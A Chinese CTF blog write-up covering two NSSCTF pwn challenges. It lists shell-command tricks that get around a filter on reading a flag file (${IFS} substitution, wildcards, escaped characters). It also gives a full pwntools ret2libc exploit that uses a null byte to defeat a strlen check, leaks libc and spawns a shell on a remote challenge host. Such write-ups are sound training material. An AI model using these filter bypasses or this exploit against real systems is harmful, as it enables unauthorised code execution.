首页 > 其他分享 >NSSCTF(PWN)10

NSSCTF(PWN)10

时间:2024-10-08 19:21:15浏览次数:10  
标签:10 p64 puts libc flag io tac PWN NSSCTF

[HUBUCTF 2022 新生赛]singout

这题是道签到题,直接nc但是cat flag得不到flag

我们可以用:

1 cat flag
2 nl${IFS}f*
3 tac fla* >&2
4 tac f\lag >&2
5 tail ./*
6 tac${IFS}f*
7 tac$IFS$9f*
8 tac ./*

用这些得到flag

[LitCTF 2023]狠狠的溢出涅~

查看发现是64位文件

这道题给了libc,可能涉及ret2libc往后看看

查看main函数发现这里涉及栈溢出,但是注意到了这里有个strlen,它的作用是防止用户进行栈溢出的,所有我们要用\x00来绕过它。

发现这题缺失了system和binsh果然是ret2libc

exp:

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28829')
elf = ELF('/home/xp/tm/bin/k')
libc = ELF('/home/xp/tm/libc/libc-2.31.so')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.sym['main']
ret = 0x400556
rdi = 0x4007d3
padding = b'\x00' + b'a'*(0x67) #0x60+0x8-0x1
payload = padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
put=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(put))
base = put - libc.sym['puts']
sys = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
io.recvuntil(b'message:')
payload1 = padding + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
io.sendline(payload1)
io.interactive()

得到我们的flag

标签:10,p64,puts,libc,flag,io,tac,PWN,NSSCTF
From: https://blog.csdn.net/fanshaoze/article/details/142766333

相关文章

  • NSSCTF(PWN)9
    [HDCTF2023]pwnner发现这是一个64位文件发现vuln双击进入我们发现第14行涉及栈溢出,且第7行告诉我们这里伪随机数种子是39,第11行这里涉及随机值判断我们运行写好的c语言,得到这个伪随机数发现这题有system和binsh找到他们exp:frompwnimport*context(os='linux',a......
  • 2024.10.8 test
    nf#34A定义两个长度相等的数列相似,当且仅当每个下标对应值在两个数列中的排名相等。对于一个长\(n\)的排列,定义\(f(A,k)\)表示有多少长\(k\)的排列和\(A\)的至少一个子序列相似。排列\(A\)的值是\(\sum_{k=1}^n[f(A,k)=C_n^k]\)。给出一个排列,有若干位置待定,求值......
  • 【2024.10.07】责任感
    终于还是做出了重要的决定,在厦门岛内买了房为什么选择这个时候买房呢一是最重要是因为一些宏观的政策改变了吧,落户政策改变了,只要有房就能落户,落户马上就能给孩子读书我和妹妹正好有年龄代差,现在买的话,后年交房后,妹妹就能在厦读书了等妹妹用完学位后,我如果这时候有孩子了,也正......
  • csp-s模拟10
    csp-s模拟10\(T1\)T3673.欧几里得的噩梦\(0pts\)部分分\(0\%\):状压加枚举子集。\(20\%\):线性基暴力做。正解\(T2\)T3672.清扫\(6pts\)原题:[AGC010C]Cleaning钦定根节点\(rt\)的度数\(\ge2\),所以需要特判\(n=2\)的情况。部分分未知\(pt......
  • 10/8
    慧鱼机电实训理论与实践结合:通过实训,我们能够将课堂上学到的理论知识应用于实际操作中,加深对机电系统的理解。团队合作的重要性:在实训过程中,往往需要与同学们密切合作,分工合作不仅提高了效率,也培养了团队意识和沟通能力。解决问题的能力:在面对设备故障或调试难题时,我学会了冷......
  • 202410-Notes for reading
    TDB1.Gravityexperimentswithradiopulsarshttps://ui.adsabs.harvard.edu/abs/2024LRR....27....5F/abstract2.PhD,Porayko,NataliyaKonstantinovna_2019_ProbingtheInterstellarMediumandDarkMatterwithPulsars5.PhD,2020,NataliyaK.PoraykoProbin......
  • 20222310 2024-2025-1 《网络与系统攻防技术》实验一实验报告
    一、实验内容1.实验目标本次实验的对象是一个名为pwn1的linux可执行文件。该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实验的目标就是想......
  • csp-s模拟10
    rank31,垫底了,T10pts,T218pts,T30pts,T450pts状态有点不好,策略有问题,T4是可以切的,但是不知道为什么弃了。T1不会线性基寄。T3奇怪结论题,T2结论题。在猜结论上还是不行。T1欧几里得的噩梦用到了线性基线性无关的性质,将两个数连边,把环去掉,并查集判断即可。统计答案用快速......
  • P10641 BZOJ3252 攻略
    题目链接简要题意给定一个有\(n\)个结点的树,树有点权且点权为正整数。现选取\(k\)条从根结点出发到叶子结点的简单路径,求这些路径的并集上所有结点的点权之和的最大值。主要算法贪心,树链剖分,(线段树合并)思路一个显然的贪心,每次选一点点权和最大的链,再讲这条链清为0。正......
  • 【1024程序猿节】IT人#摸鱼计划#,多重奖励等你来拿!
    10月摸鱼计划如期而至,全新上线3款活动任务,还有多重奖励等你来拿!【活动时间】发文时间:2024年10月8日—2024年10月31日【活动任务】以下任务福利可同享!!同时,我们为大家整理了容易被百度收录的关键词,当你写作的时候,可以直接选择热点且擅长的关键词进行博文创作。 直达热点关键词库>>任......